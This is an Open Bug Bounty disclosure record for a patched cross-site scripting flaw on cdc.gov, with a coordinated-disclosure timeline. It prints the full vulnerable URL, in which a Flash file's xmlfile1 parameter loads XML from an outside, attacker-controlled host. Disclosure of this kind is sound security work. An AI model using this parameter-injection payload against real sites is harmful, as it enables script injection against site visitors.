cdc.gov XSS vulnerability

2016-05-22T17:32:00
ID OBB:155537
Type openbugbounty
Reporter MLT
Modified 2016-07-28T11:03:00

Description

Vulnerable URL:
http://www.cdc.gov/nceh/demil/usa_locator.swf?xmlfile1=http://nsa.is.spying-on.us/o.xml
Details:

Description| Value
---|---
Patched:| Yes, at 10.07.2016
Latest check for patch:| 10.07.2016 00:43 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1505
VIP website status:| Yes
Check cdc.gov SSL connection:| (Grade: A-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 22 May, 2016 17:32 GMT
Vulnerability existence verified and confirmed| 23 May, 2016 03:52 GMT
Notification sent to subscribers (without technical details)| 23 May, 2016 06:17 GMT
Vulnerability details disclosed by researcher| 30 June, 2016 20:19 GMT
Vulnerability patched by the website owner| 28 July, 2016 11:03 GMT